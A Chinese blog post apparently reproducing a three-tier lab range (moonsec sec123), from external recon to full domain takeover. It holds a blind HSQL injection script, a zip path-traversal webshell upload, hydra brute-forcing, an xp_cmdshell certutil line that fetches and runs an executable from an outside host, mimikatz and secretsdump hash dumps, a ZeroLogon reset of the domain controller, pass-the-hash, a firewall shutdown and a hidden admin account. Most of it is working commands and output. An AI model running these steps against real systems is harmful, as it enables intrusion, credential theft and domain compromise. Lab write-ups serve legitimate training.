三层内网 外网打点到内网域 sec123 复现
文章目录
- 三层内网 外网打点到内网域 sec123 复现
- 项目介绍
- 网络配置图
- 环境搭建
- 账号和密码
- 外网打点
- 端口扫描
- 网上银行系统漏洞
- 网上银行系统Hsql注入漏洞
- tomexam SQL注入漏洞
- 编写 jspxcms 密文加密脚本进行破解
- 登录jspxcms后台getshell
- 内网渗透
- 配置内网 cobalt strike 内网上线
- 内网信息收集
- mssqlclient 登录执行命令
- 使用 SweetPotato (ms16-075) 提权 winserver2012
- SERVER 2012 内网信息收集
- fscan 扫描内网
- 抓取 Hash
- 收集域控信息
- ZeroLogon CVE-2020-1472 攻击域控 获取域权限
- 置空域控密码
- 使用 secretsdump.py 导出域Hash
- 使用 wmiexec.py 或者 psexec.py 登录域控
- 域控上线 cs
- 恢复置空的密码
- 远程RDP登录域控
- 总结
三层内网 外网打点到内网域 sec123 复现
本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
项目介绍
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。
本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点,详细介绍外网各种打点方法。
网络配置图
以下是网络拓扑图 详细的标注了各个主机名和ip 在渗透测试进行针对性操作。
环境搭建
本靶场模拟在实战环境,所以要将web1主机映射到公网上,需要一台公网的vps 去淘宝购买一台即可。
在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini
[common]
bind_port = 7000
token=hk123
在web1上配置frpc.ini 运行 frpc.exe -c frp.ini
[common]
server_addr = 103.121.93.206
server_port = 7000
token=hk123
[javaweb1]
type = tcp
local_ip = 127.0.0.1
local_port = 8878
remote_port = 8878
[javaweb2]
type = tcp
local_ip = 127.0.0.1
local_port = 8088
remote_port = 8088
[javaweb3]
type = tcp
local_ip = 127.0.0.1
local_port = 8899
remote_port = 8899
配置成功后访问 http://124.223.169.73:8899/ 测试一下
至此,靶场搭建完毕。
账号和密码
主机名 | ip | 账号和密码 |
---|---|---|
web1 | 192.168.0.126 | administrator QWEasd123 |
server2012 |
192.168.0.128 10.10.10.136 |
adninistrator QWEadmin555 sec123\cnk QWEasd789 |
ad01 | 10.10.10.139 | sec123\administrator QWEadmin001 |
web1 网站配置:
http://192.168.0.126:8878 银行系统 admin adminsec123
http://192.168.0.126:8088/login.jsp admin moonsec123
http://192.168.0.126:8899/cmscp/index.do admin zzz123zzz
外网打点
端口扫描
我们先扫描一下开放端口。(以下过程非常缓慢)
sudo masscan -p 1-65535 124.223.169.73 --rate=100
我们再使用 nmap 进行端口的具体扫描,经过测试 masscan 并不准确,我又用 goby 扫了一下得到以下端口(其中的80,8888是我的博客服务)。
nmap -sV 124.223.169.73 -sC -p 110,25,8899,8088,8878 -oN sec-ports
根据 nmap 扫描结果我们得到以下三个网站:
http://124.223.169.73:8878 | 网上银行系统 |
---|---|
http://124.223.169.73:8088/login.jsp | TomExam 网络考试系统 |
http://124.223.169.73:8899/cmscp/index.do | jspXCMS |
网上银行系统漏洞
经过在 github 中的搜索找到了这个系统的源码
https://github.com/amateur-RD/netBank-System
并且在 sql 文件中翻到登录账号。
普通账号登录成功,管理账号登录失败。
网上银行系统Hsql注入漏洞
# 这里的管理员账号要是错误的利用 or 来使后面的成为正确的
asd' or '1'='1 # 返回密码不正确
asd' or '1'='2 # 返回用户名不存在
登录处存在 bool 注入
但是 sqlmap 无法跑出 Hsql 的注入。
我们来编写一下 Hsql 注入的脚本:
# -*- coding: utf-8 -*-
import requestspassword = ""
payload = "qwertyuiopasdfghjklzxcvbnm1234567890"
url = "http://124.223.169.73:8878/admin/admin/login"
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "84",
"Origin": "http://124.223.169.73:8878",
"Connection": "close",
"Referer": "http://124.223.169.73:8878/admin/login",
"Upgrade-Insecure-Requests": "1",
}for num in range(1, 20):for pd in payload:# 其中的 Admin 表可以在源代码中翻到exp = f"admin' and(select substring(password,{str(num)},1) from Admin) like '{str(pd)}' or '1' = '2"data = {"account.username": "", "admin.username": exp, "account.password": "", "admin.password": 'aaaa', "type": 1}req = requests.post(url=url, data=data, headers=headers)if "密码不正确" in req.text:password += pdprint(f"injectioning ....[{password}]")breakprint("密码为:" + password)
得到账号和密码:admin adminsec123
但是网站登录后无法进行getshell 也无法进行跨库查询。
tomexam SQL注入漏洞
这是一个 tomexam 登录系统 年份比较久远。
尝试过弱口令后无果,注册用户登录后发现存在SQL注入:
GET /page.do?action=comm_news&act=list&classid=2 HTTP/1.1
Host: 124.223.169.73:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA5747E99BCD208F2D311B7BB489C8AF
Upgrade-Insecure-Requests: 1
我们通过注入拿到管理员登录账号
登录后台查看一番后,没有发现能够 getshell 的点。
有一个 FCK 编辑器但是目标网站是 jsp 的后端无法利用。
但是我们可以通过 sqlmap 读取到第三个网站 jspxcms 的后台登录密码。
sqlmap -r sql.txt --batch -D jspxcms -T cms_user -C f_username,f_password,f_salt --dump
这里值得注意的是这里的密码是加盐了的我们还需要盐的值。
+------------+------------------------------------------+------------------+
| f_username | f_password | f_salt |
+------------+------------------------------------------+------------------+
| anonymous | anonymous | anonymous |
| admin | 51c52ae56562d8c538600385909595b009467f0b | 9b2b38ad7cb62fd9 |
| moonsec | 508034a9e6e643ec4dd78357ce3a3da460bee5be | a4aff126c86ef107 |
+------------+------------------------------------------+------------------+
编写 jspxcms 密文加密脚本进行破解
我们先去下载一下源代码进行代码审计。
package com.jspxcms.core;
import com.jspxcms.common.security.SHA1CredentialsDigest;
import com.jspxcms.common.util.Encodes;
import java.io.File;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.PrintWriter;
import java.util.Scanner;public class Testmain {public static void main(String[] args)throws Exception {byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");SHA1CredentialsDigest test = new SHA1CredentialsDigest();String fileName = "D:\\csdnpass.txt";String fileName2 = "D:\\hashpassword2.txt";try (Scanner sc = new Scanner(new FileReader(fileName))) {while (sc.hasNextLine()) {String line = sc.nextLine();String encPass = test.digest(line, salt);File f = new File(fileName2);FileWriter fw = new FileWriter(f, true);PrintWriter pw = new PrintWriter(fw);pw.println(line + " " + encPass);pw.close();}}}
}
原谅我,才刚开始学Java,根本不会写,以上是月师傅的脚本。
登录jspxcms后台getshell
这里参考这篇文章:https://blog.csdn.net/lastwinn/article/details/119303905
使用哥斯拉生成一个god.jsp 然后打包成war
jar -cf god.war god.jsp
制作目录穿越脚本
import zipfile
zip = zipfile.ZipFile("test.zip",'w',zipfile.ZIP_DEFLATED)
with open("god.war","rb") as f:data=f.read();zip.writestr("../../../god.war",data)zip.close()
在后台找个zip上传 上传后会自动解压到网站目录 tomcat会自动解压改文件
http://124.223.169.73:8899/god/god.jsp
使用哥斯拉进行连接 至此可以获取一个webshell的权限了。
内网渗透
配置内网 cobalt strike 内网上线
项目二 详细地介绍了 metasploit在内网中的各种操作,这次直接使用cobalt stike 测试这个项目。
因为测试者本身处于内网,cobalt stike也在于内网 所以首先让后门能够内网上线。需要一台外网的vps做frp 反向代理出去。
外网 vps frps.ini
[common]
bind_port = 7000
token=QWEasd123
# 后台启动frps
nohup ./frps -c frps.ini &
内网 kali frpc.ini
[common]
server_addr = 121.4.60.34
server_port = 7000
token = QWEasd123
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
[cs]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777
[socks_proxy]
type = tcp
remote_port = 8888
plugin = socks5
后台启动 teamsever
sudo nohup ./teamserver 192.168.0.23 123456 &
使用客户端连接
生成木马上传到目标执行获取权限
内网信息收集
ipconfig 看一下发现只有一个网卡
直接开个代理,使用nmap进行扫描
修改 proxychains4 配置文件:
sudo vim /etc/proxychains4.confsocks4 127.0.0.1 1234
这里我个人比较喜欢使用 fscan 进行探测(也可以使用 masscan 或者 nmap 进行探测)
./fscan -h 192.168.0.1/24
这里可以看到不仅仅扫出了 192.168.0.128 还把它的弱口令都破解出来了。
当然常规的扫描出来 1433 MSSQL 服务我们可以使用 hydra 进行破解。
proxychains4 hydra -l sa -P /usr/share/wordlists/top10000.txt 192.168.0.128 mssql -vV -f
同样使用 hydra 也可以爆破出密码。
mssqlclient 登录执行命令
在 impacket python 工具包中有一个mssql登录的脚本
proxychains4 python3 mssqlclient.py sa@192.168.0.128
成功登录
开启 xp_cmdshell
enable_xp_cmdshell
# 执行命令
xp_cmdshell whoami
执行命令远程下载 exe 并且执行得到 server2012 权限 mssql 用户的权限
xp_cmdshell certutil -urlcache -split -f http://www.lianqing.xyz/artifact.exe c:/windows/temp/artifact.exe
xp_cmdshell c:/windows/temp/artifact.exe
成功获取权限
使用 SweetPotato (ms16-075) 提权 winserver2012
我cs上面的插件上面有这个提权,我就直接使用了,没有的可以去添加插件。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YSXjmdzS-1661501179520)(https://gitee.com/lianqing_xyz/md_image/raw/master/img/image-20220825180511201.png)]
SERVER 2012 内网信息收集
查看网卡
shell ipconfig
其中 192 段已日穿了,就只剩下 10 段了
fscan 扫描内网
添加代理使用 fscan 扫描内网
proxychains4 ./fscan_amd64_1.6 -h 10.10.10.1/24
发现存在一台主机 10.10.10.139
抓取 Hash
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbb228c4d6ceeea0590a5e4a45b1572c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 297594 bytes
[+] received output:Authentication Id : 0 ; 310443 (00000000:0004bcab)
Session : Interactive from 1
User Name : Administrator
Domain : SERVER2012
Logon Server : SERVER2012
Logon Time : 2022/8/24 23:08:10
SID : S-1-5-21-3378230354-4138003060-1591016314-500msv : [00010000] CredentialKeys* NTLM : dbb228c4d6ceeea0590a5e4a45b1572c* SHA1 : 0e7824547cf9b24af762515e73e419e2d168518f[00000003] Primary* Username : Administrator* Domain : SERVER2012* NTLM : dbb228c4d6ceeea0590a5e4a45b1572c* SHA1 : 0e7824547cf9b24af762515e73e419e2d168518ftspkg : wdigest : * Username : Administrator* Domain : SERVER2012* Password : (null)kerberos : * Username : Administrator* Domain : SERVER2012* Password : (null)ssp : credman : Authentication Id : 0 ; 127032 (00000000:0001f038)
Session : Service from 0
User Name : ReportServer
Domain : NT Service
Logon Server : (null)
Logon Time : 2022/8/24 23:06:59
SID : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 121978 (00000000:0001dc7a)
Session : Service from 0
User Name : MSSQLServerOLAPService
Domain : NT Service
Logon Server : (null)
Logon Time : 2022/8/24 23:06:59
SID : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SERVER2012$
Domain : SEC123
Logon Server : (null)
Logon Time : 2022/8/24 23:06:55
SID : S-1-5-20msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : server2012$* Domain : SEC123.CNK* Password : (null)ssp : credman : Authentication Id : 0 ; 181862 (00000000:0002c666)
Session : Service from 0
User Name : MSSQLFDLauncher
Domain : NT Service
Logon Server : (null)
Logon Time : 2022/8/24 23:07:23
SID : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 120545 (00000000:0001d6e1)
Session : Service from 0
User Name : MSSQLSERVER
Domain : NT Service
Logon Server : (null)
Logon Time : 2022/8/24 23:06:58
SID : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 115516 (00000000:0001c33c)
Session : Service from 0
User Name : MsDtsServer110
Domain : NT Service
Logon Server : (null)
Logon Time : 2022/8/24 23:06:58
SID : S-1-5-80-1770670200-1234090253-3451813168-4041049723-2370973757msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 83286 (00000000:00014556)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2022/8/24 23:06:56
SID : S-1-5-90-1msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : SERVER2012$* Domain : sec123.cnk* Password : a1 9b e5 b8 a0 56 8d f0 64 1d 9a b3 65 be 89 99 b3 08 8e 99 6e 1e 2d a7 ca 3b 69 d5 0a 95 d6 57 10 59 67 b1 6b 8d 2f a7 b7 c7 cc ac 64 60 ee dc 0e 70 05 49 23 c5 8e d8 6c 9c a2 48 0e 12 2f c0 18 d9 8a 06 56 8f 40 55 8b 90 b6 e4 23 e0 45 e6 c3 2b 86 ae f2 d7 0b 30 44 b0 5d 5a 38 ff 85 66 c3 ef cb 2d 75 f6 c2 be 53 2f 7f f3 8d d1 fc a5 6f 19 97 56 8d 51 73 bb 24 d4 16 47 e6 3c 34 20 32 a3 79 38 ff f3 ce 28 80 36 61 37 0c 80 ce 03 7a 8b 44 f9 3b 1a 69 fb ac 7e 66 63 97 76 ba 99 94 9c 7a 91 5f a1 1b 9d 51 fe 9b a8 d3 54 c0 7f 8c 04 8f 49 43 85 b2 0f 32 9e ea 35 7d 23 70 1e d1 a6 da bb bf 26 20 90 18 cc 5e 51 c0 4e 4d 26 c8 b4 df f4 8b 84 b2 11 36 50 3f 97 a6 73 a8 a5 69 9b ba 27 7b e4 d0 00 18 72 25 e1 37 ac 23 03 ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/8/24 23:06:56
SID : S-1-5-19msv : tspkg : wdigest : * Username : (null)* Domain : (null)* Password : (null)kerberos : * Username : (null)* Domain : (null)* Password : (null)ssp : credman : Authentication Id : 0 ; 50995 (00000000:0000c733)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2022/8/24 23:06:55
SID : msv : [00000003] Primary* Username : SERVER2012$* Domain : SEC123* NTLM : 2b9b6e1af2888d0ac86ee19375bf7f0e* SHA1 : 48b3b18905d70fb95dc96970c0e46ab3bd08a177tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SERVER2012$
Domain : SEC123
Logon Server : (null)
Logon Time : 2022/8/24 23:06:55
SID : S-1-5-18msv : tspkg : wdigest : * Username : SERVER2012$* Domain : SEC123* Password : (null)kerberos : * Username : server2012$* Domain : SEC123.CNK* Password : (null)ssp : credman :
收集域控信息
上面忘记说了,每拿到一台主机都可以 使用 ipconfig /all
查看一下是否存在域
并且每拿到一台主机都可以尝试抓取明文密码可能会存在某种规律或者后期横向渗透也可以使用 hash 进行碰撞。
这里收集域信息我们可以使用 cs 自带的命令
这里我们可以通过 ping 域名来获取域控的ip地址
可以看到域控的ip地址为 10.10.10.139,与我们之前的扫描结果也一样。
ZeroLogon CVE-2020-1472 攻击域控 获取域权限
下载 https://github.com/leitosama/SharpZeroLogon 进行编译执行 测试存在该漏洞
shell SharpZeroLogon.exe ad01.sec123.cnk
测试存在漏洞!
置空域控密码
shell SharpZeroLogon.exe ad01.sec123.cnk -reset
成功置空密码
使用 secretsdump.py 导出域Hash
这里的域控是属于内网的别忘了设置代理
proxychains4 python3 secretsdump.py sec123/ad01\$@10.10.10.139 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:2b9b6e1af2888d0ac86ee19375bf7f0e:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ec150c0499e85cbe28564794889d443a573ec0d52124f0244edcd84e82d366fb
krbtgt:aes128-cts-hmac-sha1-96:2e09e8b4a4599c9d8a5fe20241e5a199
krbtgt:des-cbc-md5:79a404137ff440f1
sec123.cnk\cnk:aes256-cts-hmac-sha1-96:b3beca060a69eaa1605f5eeb1071e9246bbdb7dbc1e1b36d7e581bc0eb99bc18
sec123.cnk\cnk:aes128-cts-hmac-sha1-96:6f7290694acb2ab9c0258e28297eeb65
sec123.cnk\cnk:des-cbc-md5:08e023677c29b63b
AD01$:aes256-cts-hmac-sha1-96:8dd6247d4a338326980fb1bc9ff1947a2e830ec4619ca3f82b5c3a04c22a9a9d
AD01$:aes128-cts-hmac-sha1-96:37710a53f5338f1e47707d7784b5cee8
AD01$:des-cbc-md5:e9f140b3f297f2bf
SERVER2012$:aes256-cts-hmac-sha1-96:b3fa56f1f664833512d67cd25d0a46d2bbaaeabb6f8a9274aa852697227a39be
SERVER2012$:aes128-cts-hmac-sha1-96:096ee0570f75b38ceb7fb7a4ad3e7f50
SERVER2012$:des-cbc-md5:1ca4048551daf81f
[*] Cleaning up...
使用 wmiexec.py 或者 psexec.py 登录域控
这里同样别忘了代理。
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74 sec123/Administrator@10.10.10.139
成功获取到域控的权限
域控上线 cs
首先我们先关闭防火墙,防火墙会禁止我们的很多操作。
netsh advfirewall show allprofiles # 查看防火墙状态
netsh advfirewall set allprofiles state off # 关闭防火墙
cs 生成正向 shell
使用 pth 建立连接
pth sec123\Administrator 81220c729f6ccb63d782a77007550f74
上线cs
jump psexec64 10.10.10.139 bind_tcp
恢复置空的密码
shell reg save HKLM\SYSTEM c:\system.save
shell reg save HKLM\SAM c:\sam.save
sehll reg save HKLM\SECURITY c:\security.save
使用这三个命令导出这三个文件并下载
使用 impacket 工具包中的 secretsdump.py 读取出 $MACHINE.ACC 的 Hash 。
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL# $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8c8be1b1f3136f1e13cbe18c19ad1b5d
使用 zerologon 工具恢复密码*
脚本下载地址:https://github.com/risksense/zerologon
还是使用 代理 去访问域控
proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 8c8be1b1f3136f1e13cbe18c19ad1b5d
远程RDP登录域控
使用命令添加一个隐藏用户
shell net user admin$ admin@123. /add && net localgroup administrators admin$ /add
代理 xfreerdp 连接域控
proxychains4 xfreerdp /u:admin$ /p:admin@123. /v:10.10.10.139 /cert-ignore
总结
项目难点:
- jsp 代码审计编写解密脚本
使用技术以及注意项:
frp 端口映射的使用
fscan 内网扫描器的使用
cobalt strike 的使用
hydra 爆破神器的使用
1433 MSSQL 爆破
MSSQL 执行cmd命令
Windows 提权
ZeroLogon 置空密码并恢复
代理的使用
做项目可以巩固我们所学的知识,并且可以增加实战能力,在以后的实战中会更加的得心应手。
三层内网 外网打点到内网域 sec123 复现相关推荐
- 欧拉角细节/旋转顺序/内旋外旋
此文章旨在讲清楚欧拉角使用中的细节问题,让大家能够以专业的方式表达和交流欧拉角. 1欧拉角简介 欧拉角是由Leonhard Euler 提出的概念,用来描述刚体/移动坐标系在一个固定坐标系中的姿态.简 ...
- 重邮内网外入及其最新版创翼下载
身边很多同学都想找到重邮的内网外入和,但是发现并不好找,所以我特意写在一个网站的综合页面中,这样就可以方便很多人了,不用再去东南西北的找了,希望能帮到你. 网站名称:微尘世界 如果你有更好的内容想要分 ...
- Kali使用Metasploit内、外网渗透windows系统
Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数千个已知软件漏洞的专业级漏洞攻击工具.当H.D. Moore在2003年发布Meta ...
- 手机IP和内网外网IP的访问
经过查找资料总结如下: 首先如果是gprs分配给手机的地址,可以通过在手机端用百度ip,显示结果为手机的外网ip. 那么内网和外网 1:如果是NAT的代理,那么发起连接的过程大体是这样的: 由你把连接 ...
- Apache 2.4.7在CentOS6.4中安装配置反向代理解决单外网IP对应多个内网主机的方法实践
欢迎转载,转载时请保留全文及出处. Apache 2.4.7在CentOS6.4中安装配置反向代理解决单外网IP对应多个内网主机的方法实践 Apache安装 下载源程序(http://httpd.ap ...
- 在外网通过ssh连接访问内网教程
